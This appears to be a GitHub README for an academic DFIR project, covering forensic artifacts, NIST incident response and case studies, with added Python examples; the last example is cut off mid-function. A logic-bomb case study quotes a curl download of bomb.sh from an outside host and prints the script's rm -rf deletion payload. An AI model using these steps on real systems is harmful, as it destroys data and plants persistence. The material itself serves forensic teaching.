mello-io/Operations-in-Cyber-Defense-II
Operations in Cyber Defence - II

Digital Forensics & Incident Response (DFIR) Implementation

M.Sc. IT IMS & CS (Integrated) | Gujarat University | May 2023


📋 Project Overview

Objective

This project demonstrates Digital Forensics and Incident Response (DFIR) methodologies in enterprise Security Operations Centers, focusing on evidence collection, analysis, and systematic incident handling procedures for effective cyber incident investigation and response.

Key Highlights

  • Digital Forensics Investigation: Complete forensic process from identification to presentation.
  • Evidence Handling: Chain of custody, data integrity, and attack attribution (MITRE ATT&CK).
  • Incident Response: NIST SP 800-61 computer security incident handling (CSIH) lifecycle implementation.
  • SOC Integration: SOAR, SIEM, EDR/XDR deployment for automated response.
  • Real Case Studies: Linux forensics investigation and incident handling audits.
  • OS Forensics: Windows Registry, file system, and Linux artifacts analysis.

Scope

Core Problem Addressed: As cyber incidents increase, organizations need structured DFIR capabilities to investigate breaches, preserve evidence, and develop effective remediation strategies.

Focus Areas:

  • Digital forensics investigation methodology and evidence collection
  • Incident response planning and lifecycle (NIST framework)
  • Windows and Linux forensic artifact identification
  • SOC implementation of DFIR tools (SOAR, SIEM, EDR/XDR)
  • Attack attribution using MITRE ATT&CK framework
  • Real-world case investigations and incident handling procedures

🎯 Learning Outcomes

This project demonstrates proficiency in:

Technical Skills

  • Digital Forensics: Evidence identification, acquisition, examination, analysis, and reporting.
  • Incident Response: Detection, containment, eradication, recovery, and post-incident activities.
  • Forensic Tools: Autopsy, FTK Imager, Volatility, Eric Zimmerman's tools, Wireshark.
  • OS Forensics: Windows Registry analysis, file system forensics, Linux log analysis.
  • Evidence Management: Chain of custody, data integrity verification, legal admissibility.
  • Attack Attribution: Threat actor profiling using MITRE ATT&CK TTPs.
  • SOC Operations: SOAR orchestration, SIEM correlation, EDR/XDR deployment.

Security Domains

  • Digital forensic investigation processes
  • Computer security incident response (CSIRT operations)
  • Network and memory forensics
  • Malware analysis and reverse engineering
  • Legal and compliance (evidence handling, expert witness testimony)
  • Threat intelligence and IOC extraction

Professional Competencies

  • NIST SP 800-61 incident handling procedures
  • Evidence documentation and court admissibility
  • Forensic reporting and expert testimony
  • Compliance frameworks (CMMC, GDPR, legal requirements)
  • Cross-functional team coordination (legal, IT, management)

📚 Project Structure

Section 1: Understanding Digital Forensics & Incident Response (Pages 1-53)

Digital Forensics (Pages 2-16):

  • Classification: Disk, Network, Memory, Malware, Email, Mobile forensics
  • Investigation methodology and evidence types
  • Chain of custody and data preservation
  • Attack attribution using MITRE ATT&CK
  • Legal considerations and expert witness requirements

Incident Response (Pages 17-53):

  • NIST SP 800-61 lifecycle (Preparation, Detection, Containment, Recovery)
  • CSIRT team structure and stakeholder coordination
  • Incident handling checklist and SOPs
  • Windows and Linux IR templates
  • Post-incident activities and lessons learned

Section 2: SOC Implementation of DFIR (Pages 54-79)

Digital Forensics Toolkit (Pages 54-56):

  • Network analysis (Wireshark, NetworkMiner)
  • Registry analysis (RegRipper, ShellBags Explorer)
  • Memory forensics (Volatility, Magnet RAM Capture)
  • Disk analysis (FTK Imager, Sleuth Kit, Autopsy)

Windows Forensics Artifacts (Pages 57-71):

  • Registry hives analysis (HKLM, HKCU, SAM, NTUSER.DAT)
  • File system forensics (NTFS, MFT, USN Journal, Volume Shadow Copy)
  • Evidence of execution (Prefetch, ShimCache, AmCache, BAM/DAM)
  • USB device tracking and external media forensics

Linux Forensics Artifacts (Pages 71-74):

  • System configuration (/etc/passwd, sudoers, network interfaces)
  • Authentication logs (wtmp, btmp, auth.log)
  • Persistence mechanisms (cron jobs, .bashrc, service startups)
  • Evidence of execution (bash_history, .viminfo, sudo logs)

SOC IR Systems (Pages 75-77):

  • SOAR platforms (Splunk, Palo Alto Cortex XSOAR)
  • SIEM solutions (IBM QRadar, Splunk, LogRhythm)
  • EDR/XDR tools (CrowdStrike Falcon, Microsoft Defender)
  • UEBA systems (ManageEngine, Rapid7 InsightIDR)

Section 3: Case Study - Linux Forensics Investigation (Pages 80-86)

  • Real-world scenario: Disgruntled IT employee logic bomb
  • Evidence collection from Linux system
  • Timeline reconstruction using auth logs and bash history
  • Malicious script identification and cronjob analysis
  • Security recommendations post-investigation

Section 4: Case Study - Incident Handling Audits (Pages 87-93)

Scenario 1: Worm and DDoS agent infestation in investment firm

Scenario 2: Unauthorized access to payroll records in hospital

  • Per-phase audit questionnaires (Preparation → Post-Incident)
  • Response procedures following NIST framework
  • Stakeholder coordination and communication plans

🛠️ Tools & Technologies

Digital Forensics Tools

| Tool | Category | Purpose |
|---|---|---|
| Autopsy | Disk Analysis | Open-source digital forensics platform |
| FTK Imager | Disk Imaging | Forensic disk image acquisition |
| Volatility | Memory Forensics | RAM dump analysis |
| Wireshark | Network Forensics | Packet capture and analysis |
| Eric Zimmerman's Tools | Windows Artifacts | Registry, MFT, Prefetch, Jump Lists parsers |
| Sleuth Kit | File System Analysis | File system forensic analysis toolkit |
| RegRipper | Registry Analysis | Windows Registry parsing |

Incident Response Tools

| Tool | Category | Purpose |
|---|---|---|
| Splunk SOAR | Orchestration | Security automation and response |
| IBM QRadar | SIEM | Security information and event management |
| CrowdStrike Falcon | EDR/XDR | Endpoint detection and response |
| Kali Linux | IR Toolkit | Penetration testing and IR distribution |
| SANS SIFT | Forensic Workstation | Digital forensics and IR environment |
| Redline | Memory Analysis | Memory and file analysis |
| MISP | Threat Intelligence | Malware information sharing platform |

Analysis Tools

| Tool | Category | Purpose |
|---|---|---|
| MFTECmd | File System | $MFT, $Boot, $J parser |
| PECmd | Prefetch | Windows Prefetch file parser |
| JLECmd | Jump Lists | Windows Jump Lists analysis |
| LECmd | Shortcuts | LNK file analysis |
| DB Browser for SQLite | Database | SQLite database examination |
| AmcacheParser | Execution | AmCache.hve parsing |

🔬 Lab Setup

Environment

  • Virtualization: VMware Workstation 16 Pro
  • Forensic Workstation: SANS SIFT, Kali Linux 2021
  • Analysis OS: Windows 10, Ubuntu 20.04
  • Test Scenarios: Isolated lab with compromised systems

Base Requirements

Hardware:

CPU: 8+ cores (forensic analysis workload)
RAM: 32GB minimum (64GB for memory forensics)
Storage: 2TB+ (disk images, evidence storage)

Software Stack:

Forensics:
  - Autopsy 4.x
  - FTK Imager
  - Eric Zimmerman's Tools
  - Volatility 2.x/3.x
  
Incident Response:
  - SIEM: Splunk, ELK Stack
  - SOAR: Splunk SOAR
  - EDR: CrowdStrike Falcon
  
OS Analysis:
  - SANS SIFT Workstation
  - Kali Linux
  - REMnux (malware analysis)

Investigation Setup

Evidence Collection
       ↓
Forensic Imaging (Write-Blocked)
       ↓
Hash Verification (SHA-256)
       ↓
Working Copy Creation
       ↓
Analysis Environment (Isolated)
       ↓
Artifact Extraction & Timeline
       ↓
Report Generation
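The imaging, hash verification and working-copy steps above are the part of the setup that later decides whether evidence is admissible, so they are worth scripting rather than doing by hand. The following is an added example (not code from the project): it hashes an acquired image in chunks, appends each handling step to a JSON-lines chain-of-custody log, and verifies a working copy against the hash recorded at acquisition. The case ID, evidence ID, examiner name and the image content are constructed placeholders, and the files are created in a temporary directory so it runs offline.

```python
"""SHA-256 verification and chain-of-custody logging for forensic images.

Added example, not part of the project. Only the standard library is used;
case/evidence identifiers and the image bytes are constructed placeholders.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # hash in 1 MiB chunks so a multi-GB image never has to fit in RAM


def sha256_file(path):
    """Hex SHA-256 of a file, streamed from disk."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def custody_entry(case_id, evidence_id, path, action, examiner):
    """One chain-of-custody record: who did what to which item, and its hash at that moment."""
    return {
        "case_id": case_id,
        "evidence_id": evidence_id,
        "path": path,
        "action": action,
        "examiner": examiner,
        "sha256": sha256_file(path),
        "timestamp_utc": datetime.now(timezone.utc).isoformat(timespec="seconds"),
    }


def append_custody(log_path, entry):
    """Append-only log: one JSON object per line, never rewritten."""
    with open(log_path, "a") as f:
        f.write(json.dumps(entry) + "\n")


def verify_against_log(log_path, evidence_id, path):
    """Return (ok, expected, actual): does `path` still hash to the value recorded at acquisition?"""
    with open(log_path) as f:
        entries = [json.loads(line) for line in f if line.strip()]
    acquired = [e for e in entries if e["evidence_id"] == evidence_id and e["action"] == "acquired"]
    if not acquired:
        raise ValueError(f"no acquisition record for {evidence_id}")
    expected = acquired[0]["sha256"]
    actual = sha256_file(path)
    return actual == expected, expected, actual


def demo():
    """Acquire -> hash -> working copy -> verify, then show a modified copy failing verification."""
    with tempfile.TemporaryDirectory() as workdir:
        # constructed stand-in for a dd image; a real one would come from a write-blocked acquisition
        image = os.path.join(workdir, "disk01.raw")
        with open(image, "wb") as f:
            f.write(b"\x00" * 4096 + b"CONSTRUCTED EVIDENCE IMAGE" + os.urandom(1024))
        log = os.path.join(workdir, "custody.jsonl")
        append_custody(log, custody_entry("CASE-PLACEHOLDER-001", "EV-01", image, "acquired", "examiner A"))

        # analysis happens on a working copy; the original is never opened for writing again
        copy = os.path.join(workdir, "disk01_working.raw")
        with open(image, "rb") as src, open(copy, "wb") as dst:
            dst.write(src.read())
        append_custody(log, custody_entry("CASE-PLACEHOLDER-001", "EV-01", copy, "working copy created", "examiner A"))
        ok_copy, _, _ = verify_against_log(log, "EV-01", copy)

        # a single changed byte in the working copy must be caught before any finding is reported
        with open(copy, "r+b") as f:
            f.seek(0)
            f.write(b"\xff")
        ok_tampered, expected, actual = verify_against_log(log, "EV-01", copy)
        return ok_copy, ok_tampered


if __name__ == "__main__":
    good, bad = demo()
    print(f"working copy verified: {good}; modified copy verified: {bad}")
```

Re-run `verify_against_log` on the original image before and after every examination session, and keep the JSON-lines log with the evidence; the hash at acquisition is the value an opposing expert will ask for.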

✨ Features Implemented

1. Digital Forensics Investigation Process

NIST SP 800-86 Four-Phase Process:

Collection
  ├─ Identify potential sources of data
  ├─ Use write-blockers for acquisition
  ├─ Create forensic images (dd, FTK Imager)
  └─ Document chain of custody

Examination
  ├─ Extract relevant information
  ├─ Decompress/decrypt data
  ├─ Remove irrelevant data
  └─ Identify actual evidence

Analysis
  ├─ Draw conclusions from evidence
  ├─ Correlate data from multiple sources
  ├─ Document timeline of events
  └─ Identify salient features

Reporting
  ├─ Prepare detailed findings
  ├─ Present impartial conclusions
  ├─ Document limitations
  └─ Provide recommendations

Evidence Collection Priority (RFC 3227):

  1. Memory registers, caches
  2. Routing tables, ARP cache, RAM
  3. Temporary file systems
  4. Non-volatile storage (HDD, SSD)
  5. Remote logging data
  6. Physical topology
  7. Archival media

2. Windows Forensic Artifacts

Registry Analysis:

Key Hive Locations:

System Hives:
  C:\Windows\System32\Config\
    ├─ DEFAULT
    ├─ SAM
    ├─ SECURITY
    ├─ SOFTWARE
    └─ SYSTEM

User Hives:
  C:\Users\<username>\
    ├─ NTUSER.DAT
    └─ AppData\Local\Microsoft\Windows\
        └─ USRCLASS.DAT

Critical Registry Keys:

| Artifact | Location | Information |
|---|---|---|
| OS Version | SOFTWARE\Microsoft\Windows NT\CurrentVersion | Build, version, install date |
| Computer Name | SYSTEM\CurrentControlSet\Control\ComputerName | Machine identification |
| Time Zone | SYSTEM\CurrentControlSet\Control\TimeZoneInformation | System time zone |
| Network Interfaces | SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces | IP config, DHCP |
| USB Devices | SYSTEM\CurrentControlSet\Enum\USBSTOR | Connected USB history |
| AutoRuns | SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Startup programs |
| Recent Files | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs | User file access |
| UserAssist | NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist | Program execution stats |

File System Forensics:

NTFS Master File Table ($MFT):

Critical MFT Files:
  $MFT         → Directory of all files
  $LOGFILE     → Transactional logging
  $UsnJrnl     → Change journal (file modifications)
  $BITMAP      → Cluster allocation status

Evidence of Execution:

  • Prefetch Files: C:\Windows\Prefetch\*.pf (execution count, last run time)
  • ShimCache: SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
  • AmCache: C:\Windows\appcompat\Programs\Amcache.hve
  • BAM/DAM: SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}
  • Jump Lists: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations

Analysis Commands:

# Parse MFT
MFTECmd.exe -f C:\$MFT --csv output.csv

# Parse Prefetch
PECmd.exe -d C:\Windows\Prefetch --csv output.csv

# Parse Registry
RECmd.exe -d C:\Windows\System32\Config --bn BatchExample.reb

# Parse Jump Lists
JLECmd.exe -d "C:\Users\username\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations" --csv output.csv

3. Linux Forensic Artifacts

System Information:

# OS Release
cat /etc/os-release

# User Accounts
cat /etc/passwd
cat /etc/shadow  # (requires root)

# Sudo Privileges
sudo cat /etc/sudoers

# Network Config
cat /etc/network/interfaces
ip address show
cat /etc/hosts
cat /etc/resolv.conf

Authentication & Logs:

# Login History
sudo last -f /var/log/wtmp     # Successful logins
sudo last -f /var/log/btmp     # Failed logins

# Authentication Logs
cat /var/log/auth.log | tail
cat /var/log/secure  # (RHEL/CentOS)

# System Logs
cat /var/log/syslog | head
cat /var/log/messages  # (RHEL/CentOS)

Evidence of Execution:

# Bash History
cat ~/.bash_history
cat /root/.bash_history

# Vim History
cat ~/.viminfo

# Sudo Commands
cat /var/log/auth.log* | grep -i COMMAND

# Running Processes
ps aux
ps -ef

# Open Files by Process
lsof -p <PID>

# Network Connections
netstat -natp
ss -tulpn

Persistence Mechanisms:

# Cron Jobs
cat /etc/crontab
ls /etc/cron.*
crontab -u root -l

# Startup Services
ls /etc/init.d/
systemctl list-unit-files --type=service

# RC Files
cat ~/.bashrc
cat /etc/bash.bashrc
cat /etc/profile

4. Incident Response Lifecycle

NIST SP 800-61 Implementation:

Phase 1: Preparation

  • CSIRT team establishment and training
  • Incident response plan development
  • Tool acquisition (jump kit preparation)
  • Communication protocols establishment
  • Risk assessment and control implementation

Phase 2: Detection and Analysis

Attack Vectors:

  • Web-based attacks
  • Email (phishing, malware attachments)
  • Lost/stolen devices
  • Impersonation/social engineering
  • Attrition (brute force)
  • Removable media

Signs of Incident:

  • Precursors: Port scans, vulnerability announcements, threats
  • Indicators: Antivirus alerts, unusual files, bounced emails, network anomalies

Analysis Steps:

1. Validate Incident
   └─ Correlate multiple indicators

2. Scope Investigation
   ├─ Identify affected systems
   ├─ Determine attack origin
   └─ Assess initial impact

3. Prioritize Incident
   ├─ Functional impact (service disruption)
   ├─ Information impact (data breach)
   └─ Recoverability effort

4. Notify Stakeholders
   └─ Management, legal, affected parties

Phase 3: Containment, Eradication, Recovery

Containment Strategy:

  • Short-term: Isolate affected systems
  • Long-term: Rebuild clean systems
  • Evidence preservation during containment

Eradication:

  • Remove malware and malicious accounts
  • Identify and patch exploited vulnerabilities
  • Validate all affected systems identified

Recovery:

  • Restore from clean backups
  • Rebuild compromised systems from scratch
  • Implement additional monitoring
  • Update security controls

Phase 4: Post-Incident Activities

Lessons Learned Meeting:

Questions to Address:
- What happened and when?
- How well did staff perform?
- Were procedures followed?
- What information was needed sooner?
- What would we do differently?
- How can we prevent recurrence?
- What additional tools are needed?

Incident Documentation:

  • Timeline of events
  • Actions taken
  • Evidence collected
  • Root cause analysis
  • Remediation steps
  • Cost assessment

5. SOAR Implementation

Security Orchestration Capabilities:

Automated Workflows:
  ├─ Alert Enrichment
  │   ├─ Threat intelligence lookup
  │   ├─ WHOIS/DNS queries
  │   └─ File reputation checks
  │
  ├─ Incident Response
  │   ├─ Auto-isolation of compromised hosts
  │   ├─ User account disablement
  │   └─ Firewall rule updates
  │
  └─ Case Management
      ├─ Ticket creation (ITSM integration)
      ├─ Evidence collection
      └─ Stakeholder notification

Playbook Example - Malware Detection:

Trigger: Antivirus alert
  
1. Enrich Alert
   - Query VirusTotal
   - Check MISP database
   - Lookup file hash in Talos
  
2. Containment
   - Isolate endpoint from network
   - Disable user account
   - Block hash at firewall
  
3. Investigation
   - Collect memory dump
   - Extract running processes
   - Capture network connections
  
4. Notification
   - Create JIRA ticket
   - Email SOC manager
   - Update case management system

6. MITRE ATT&CK Attribution

Mapping Observed TTPs:

| Tactic | Technique | ID | Evidence |
|---|---|---|---|
| Initial Access | Phishing | T1566 | Malicious email attachment |
| Execution | User Execution | T1204 | Victim opened file |
| Persistence | Scheduled Task/Job | T1053 | Cron job created |
| Privilege Escalation | Sudo/Su | T1169 | Added user to sudoers |
| Defense Evasion | File Deletion | T1070.004 | Renamed malicious script |
| Discovery | System Information Discovery | T1082 | Ran ps, netstat commands |
| Collection | Data from Local System | T1005 | Accessed sensitive files |
| Command and Control | Remote File Copy | T1105 | Downloaded script via curl |

🔄 Process Flow

Digital Forensics Workflow

Incident Occurs
       ↓
First Responder Actions
  ├─ Secure scene
  ├─ Document initial state
  └─ Notify CSIRT
       ↓
Evidence Identification
  ├─ Volatile data (memory, network)
  ├─ Non-volatile data (disk, logs)
  └─ Physical evidence (devices)
       ↓
Evidence Collection
  ├─ Write-blocked imaging
  ├─ Memory dump acquisition
  ├─ Network packet capture
  └─ Hash verification (SHA-256)
       ↓
Evidence Preservation
  ├─ Chain of custody documentation
  ├─ Secure storage (evidence bags)
  └─ Access logging
       ↓
Forensic Examination
  ├─ Create working copy
  ├─ Extract artifacts
  ├─ Recover deleted files
  └─ Timeline creation
       ↓
Analysis & Correlation
  ├─ Identify IOCs
  ├─ Reconstruct events
  ├─ Attribute attack
  └─ Assess impact
       ↓
Reporting
  ├─ Technical report
  ├─ Executive summary
  ├─ Court testimony (if required)
  └─ Recommendations

Incident Response Workflow

Alert Generation (SIEM/EDR)
       ↓
Triage (Tier 1)
  ├─ Validate alert
  ├─ Categorize incident
  ├─ Assign priority
  └─ Decision: Escalate or Close
       ↓
Investigation (Tier 2)
  ├─ Collect evidence
  ├─ Analyze indicators
  ├─ Determine scope
  └─ Containment recommendation
       ↓
Containment Strategy
  ├─ Short-term: Isolate systems
  ├─ Long-term: Patch vulnerabilities
  └─ Evidence preservation
       ↓
Eradication
  ├─ Remove malware
  ├─ Delete malicious accounts
  ├─ Patch exploited vulnerabilities
  └─ Verify complete removal
       ↓
Recovery
  ├─ Restore from backups
  ├─ Rebuild compromised systems
  ├─ Verify functionality
  └─ Enhanced monitoring
       ↓
Post-Incident
  ├─ Lessons learned meeting
  ├─ Update procedures
  ├─ Improve defenses
  └─ Document for compliance

📊 Practical Demonstrations

Case Study 1: Linux Logic Bomb Investigation

Scenario: Disgruntled IT employee at CyberT planted logic bomb

Investigation Timeline:

December 28, 06:19:01 - Initial Activity
  └─ User 'cybert' installed dokuwiki package
      Evidence: /var/log/auth.log

December 28, 06:26:53 - User Creation
  └─ Created new user 'it-admin'
      Command: useradd it-admin
      Evidence: /var/log/auth.log

December 28, 06:27:34 - Privilege Escalation
  └─ Added 'it-admin' to sudoers
      Command: visudo
      Evidence: /var/log/auth.log

December 28, 06:29:14 - Malicious Script Download
  └─ Downloaded bomb.sh from external server
      Command: curl 10.10.158.38:8080/bomb.sh -output bomb.sh
      Evidence: /home/it-admin/.bash_history

December 28, 06:29:xx - File Rename & Move
  └─ Renamed to os-update.sh and moved to /bin
      Evidence: /home/it-admin/.viminfo

December 28, 06:31:xx - Persistence Established
  └─ Added script to cron job for execution at 8 AM
      Evidence: /etc/crontab

Forensic Artifacts Analyzed:

| Artifact | Location | Finding |
|---|---|---|
| Auth Logs | /var/log/auth.log | User creation, sudo usage, package installation |
| Bash History | ~/.bash_history | Downloaded malicious script via curl |
| Vim Info | ~/.viminfo | File editing history (renamed bomb.sh) |
| Crontab | /etc/crontab | Scheduled task for malicious script |
| Script Content | /bin/os-update.sh | Logic bomb: deletes files if no login in 30 days |
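The timeline above was built by correlating three of the Linux artifacts listed in the "Linux Forensic Artifacts" section: sudo entries in auth.log, the new account's bash history, and /etc/crontab. The following is an added example (not the project's own code) that does that correlation programmatically: it parses the syslog-format sudo and useradd lines, flags commands that change privileges, reports downloader commands found in a history file (which carries no timestamps unless HISTTIMEFORMAT was set), and flags root cron jobs that run something outside package-managed paths. The sample lines are constructed to mirror this case study; the host name, PIDs, UID, the 198.51.100.7 address (a documentation-range address), the year passed in (syslog lines omit it) and the flagging heuristics are all assumptions.

```python
"""Reconstruct a Linux intrusion timeline from auth.log, bash history and /etc/crontab.

Added example, not part of the project. Sample artifact lines are constructed
to mirror the case study; names, PIDs, addresses and heuristics are assumptions.
"""
import re
from datetime import datetime

SYSLOG_TS = r"(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d)"
SUDO_RE = re.compile(SYSLOG_TS + r" \S+ sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")
USERADD_RE = re.compile(SYSLOG_TS + r" \S+ useradd\[\d+\]: new user: name=(?P<name>[^,]+)")
# five schedule fields, the run-as user (system crontab format), then the command; '#' lines never match
CRON_RE = re.compile(r"^\s*(?P<sched>(?:[^\s#]+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")

# assumed heuristics: commands that change who can do what, and tools that pull content from outside
PRIVILEGE_CHANGES = ("visudo", "useradd", "usermod", "/etc/sudoers", "crontab")
DOWNLOADERS = ("curl", "wget")

# Constructed sample artifacts (timestamps follow the case-study timeline)
AUTH_LOG = [
    "Dec 28 06:19:01 cybert-srv sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki",
    "Dec 28 06:26:53 cybert-srv sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/useradd it-admin",
    "Dec 28 06:26:53 cybert-srv useradd[1532]: new user: name=it-admin, UID=1001, GID=1001, home=/home/it-admin, shell=/bin/bash",
    "Dec 28 06:27:34 cybert-srv sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo",
]
BASH_HISTORY = ["cd /tmp", "curl http://198.51.100.7:8080/bomb.sh -o bomb.sh", "vim bomb.sh"]
CRONTAB = [
    "SHELL=/bin/sh",
    "# m h dom mon dow user command",
    "17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly",
    "0 8 * * * root /bin/os-update.sh",
]


def _parse_ts(raw, year):
    # syslog timestamps carry no year; the caller supplies it from the log's mtime or the case file
    return datetime.strptime(f"{year} {' '.join(raw.split())}", "%Y %b %d %H:%M:%S")


def parse_auth_log(lines, year):
    events = []
    for line in lines:
        m = SUDO_RE.match(line)
        if m:
            flagged = any(p in m["cmd"] for p in PRIVILEGE_CHANGES)
            events.append({"time": _parse_ts(m["ts"], year), "source": "auth.log", "actor": m["user"],
                           "detail": f"sudo -u {m['target']} {m['cmd']}", "flag": flagged})
            continue
        m = USERADD_RE.match(line)
        if m:
            events.append({"time": _parse_ts(m["ts"], year), "source": "auth.log", "actor": "root",
                           "detail": f"account created: {m['name']}", "flag": True})
    return events


def parse_bash_history(lines, owner):
    """Order is all a plain .bash_history gives us, so the line index stands in for a timestamp."""
    findings = []
    for idx, cmd in enumerate(lines, 1):
        first = cmd.strip().split(" ", 1)[0]
        if first in DOWNLOADERS:
            findings.append({"time": None, "source": f"{owner} .bash_history#{idx}", "actor": owner,
                             "detail": f"remote download: {cmd.strip()}", "flag": True})
    return findings


def parse_crontab(lines):
    findings = []
    for line in lines:
        m = CRON_RE.match(line)
        if not m:
            continue
        cmd = m["cmd"].strip()
        # heuristic: a root job running something outside /usr or the cron.* directories deserves a look
        unusual = m["user"] == "root" and not cmd.startswith(("/usr/", "/etc/cron", "run-parts", "cd /"))
        findings.append({"time": None, "source": "/etc/crontab", "actor": m["user"],
                         "detail": f"cron {m['sched'].strip()} -> {cmd}", "flag": unusual})
    return findings


def build_timeline(auth_lines, history_lines, history_owner, crontab_lines, year):
    """Timed events first (sorted), then the untimed history and cron findings."""
    timed = sorted(parse_auth_log(auth_lines, year), key=lambda e: e["time"])
    untimed = parse_bash_history(history_lines, history_owner) + parse_crontab(crontab_lines)
    events = timed + untimed
    return {"events": events, "flagged": [e for e in events if e["flag"]]}


if __name__ == "__main__":
    result = build_timeline(AUTH_LOG, BASH_HISTORY, "it-admin", CRONTAB, year=2022)
    for e in result["events"]:
        when = e["time"].isoformat(" ") if e["time"] else "(no timestamp)"
        print(f"{'!' if e['flag'] else ' '} {when:19} {e['source']:26} {e['actor']:9} {e['detail']}")
```

The untimed findings are deliberately kept separate from the auth.log events rather than guessed into the timeline; in the case study their order was pinned down by .viminfo and the crontab modification time, which is the kind of corroboration a report should cite before stating a sequence.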

Malicious Script Analysis:

#!/bin/bash
# Logic bomb condition
OUTPUT=$(last | grep it-admin | head -1 | awk '{print $NF}')
if [ "$OUTPUT" -gt 30 ]; then
    rm -rf /var/www/dokuwiki/*
    echo "Goodbye from your friendly IT admin!" > /var/www/goodbye.txt
fi

Key Findings:

  • Motive: Revenge/sabotage
  • Method: Logic bomb triggered by login inactivity
  • Impact: Potential deletion of DokuWiki installation
  • Attribution: Confirmed via command history and log correlation

Remediation Actions:

  1. ✅ Removed malicious user account it-admin
  2. ✅ Deleted script /bin/os-update.sh
  3. ✅ Removed cron job entry
  4. ✅ Audited all user accounts for unauthorized additions
  5. ✅ Reviewed sudo access logs
  6. ✅ Implemented enhanced monitoring on privileged commands

Case Study 2: Incident Handling Audit - Worm Infestation

Scenario: Investment firm infected with worm via removable media, DDoS agent installed

Incident Response Audit Questions:

Preparation Phase:

  • ✓ Incident response plan documented?
  • ✓ CSIRT team trained and equipped?
  • ✓ Backup systems tested and verified?
  • ✓ Critical systems identified and prioritized?
  • ✓ Communication plan established?
  • ✓ Jump kit prepared with forensic tools?

Detection and Analysis:

  • How was infection initially detected?
  • What systems are affected?
  • Are critical systems compromised?
  • Extent of damage assessment?
  • Threat severity classification?
  • Have antivirus signatures been updated?

Containment:

  • Have infected systems been isolated?
  • Are shares and removable media access disabled?
  • Is network segmentation enforced?
  • Are admin passwords rotated?

Eradication and Recovery:

  • Has worm been removed from all systems?
  • Are exploited vulnerabilities patched?
  • Have systems been restored from clean backups?
  • Is DDoS agent completely eradicated?

Post-Incident:

  • Lessons learned meeting conducted?
  • IR plan updated with findings?
  • Employees notified and trained?
  • Follow-up assessments scheduled?

Case Study 3: Payroll Data Breach

Scenario: Unknown person accessed unlocked workstation with payroll system open

Response Procedures:

Immediate Actions (0-1 hour):

1. Isolate workstation from network
2. Disable compromised user account
3. Document current state (photos, screenshots)
4. Notify CSIRT and legal team
5. Preserve volatile memory (RAM dump)

Investigation (1-24 hours):

1. Forensic imaging of workstation
2. Review security camera footage
3. Analyze Windows Event Logs
   - Security log (Event ID 4624: Logon)
   - Application log (Payroll system access)
4. Check payroll system audit logs
5. Interview administrator and witnesses
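Step 3 above hinges on reading the Security log correctly: for an unlocked-workstation scenario the question is not just who logged on (4624) but whether that console session was locked (4800) or unlocked (4801) at the moment of the unauthorized access. The following is an added example (not the project's own code) that reconstructs logon sessions from exported Security events and answers "which interactive sessions were logged on and unlocked at time T?". The records are constructed to resemble Security-log events exported to JSON, with field names taken from the event XML (EventID, TimeCreated, TargetUserName, TargetLogonId, LogonType, WorkstationName); the host, user and account names and the timestamps are placeholders.

```python
"""Logon-session reconstruction from Security-log events 4624/4634/4800/4801.

Added example, not part of the project. Records are constructed; host and user
names are placeholders. Field names follow the Windows event XML.
"""
from datetime import datetime, timezone

# Logon types as documented for event 4624 (subset relevant to console access)
LOGON_TYPES = {2: "Interactive", 3: "Network", 7: "Unlock", 10: "RemoteInteractive"}

# Constructed sample: a morning console logon, a network logon from a file server probe,
# the console locked at 09:20 and unlocked at 09:41, logoff at 10:05
SAMPLE = [
    {"EventID": 4624, "TimeCreated": "2023-05-02T08:02:11Z", "TargetUserName": "payroll.clerk",
     "TargetLogonId": "0x3E7A1", "LogonType": 2, "WorkstationName": "HR-WS-07"},
    {"EventID": 4624, "TimeCreated": "2023-05-02T09:15:40Z", "TargetUserName": "HR-WS-07$",
     "TargetLogonId": "0x41002", "LogonType": 3, "WorkstationName": "FS-01"},
    {"EventID": 4634, "TimeCreated": "2023-05-02T09:15:41Z", "TargetUserName": "HR-WS-07$",
     "TargetLogonId": "0x41002", "LogonType": 3},
    {"EventID": 4800, "TimeCreated": "2023-05-02T09:20:05Z", "TargetUserName": "payroll.clerk",
     "TargetLogonId": "0x3E7A1"},
    {"EventID": 4801, "TimeCreated": "2023-05-02T09:41:30Z", "TargetUserName": "payroll.clerk",
     "TargetLogonId": "0x3E7A1"},
    {"EventID": 4634, "TimeCreated": "2023-05-02T10:05:00Z", "TargetUserName": "payroll.clerk",
     "TargetLogonId": "0x3E7A1", "LogonType": 2},
]


def ts(s):
    """Parse the exported UTC timestamp format used in the records."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse(records):
    events = [dict(r, time=ts(r["TimeCreated"])) for r in records]
    return sorted(events, key=lambda e: e["time"])


def reconstruct_sessions(events):
    """Group events by TargetLogonId: 4624 opens a session, 4634 closes it, 4800/4801 bracket lock periods."""
    sessions = {}
    for e in events:
        lid = e.get("TargetLogonId")
        if e["EventID"] == 4624:
            sessions[lid] = {"user": e["TargetUserName"],
                             "logon_type": LOGON_TYPES.get(e["LogonType"], str(e["LogonType"])),
                             "source": e.get("WorkstationName"), "logon": e["time"],
                             "logoff": None, "locks": []}
        elif lid in sessions:
            s = sessions[lid]
            if e["EventID"] == 4634:
                s["logoff"] = e["time"]
            elif e["EventID"] == 4800:
                s["locks"].append([e["time"], None])   # lock started, not yet unlocked
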